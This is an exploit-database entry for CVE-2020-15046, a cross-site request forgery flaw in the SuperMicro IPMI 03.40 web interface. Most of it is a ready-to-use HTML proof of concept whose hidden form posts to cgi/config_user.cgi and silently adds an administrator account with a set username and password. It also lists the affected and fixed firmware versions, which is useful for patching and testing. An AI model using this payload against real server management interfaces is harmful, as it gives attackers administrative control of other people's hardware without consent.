Exploit for SuperMicro IPMI 03.40 Cross Site Request Forgery CVE-2020-15046

## https://sploitus.com/exploit?id=PACKETSTORM:158373
# Exploit Title: SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: https://www.supermicro.com/  
# Software Link: https://www.supermicro.com/en/solutions/management-software/bmc-resources  
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40  
# CVE: CVE-2020-15046  
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery  
  
# Description:  
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and  
# IPMI firmware 03.40  
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to  
add new admin users.  
# The fixed versions are BIOS 3.2 and firmware 03.88.  
  
# PoC :  
  
<html>  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">  
<input type="hidden" name="username" value="JOKER" />  
<input type="hidden" name="original_username" value="2" />  
<input type="hidden" name="password" value="onebadday" />  
<input type="hidden" name="new_privilege" value="4" />  
<input type="submit" value="submit request" />  
</form>  
</body>  
</html>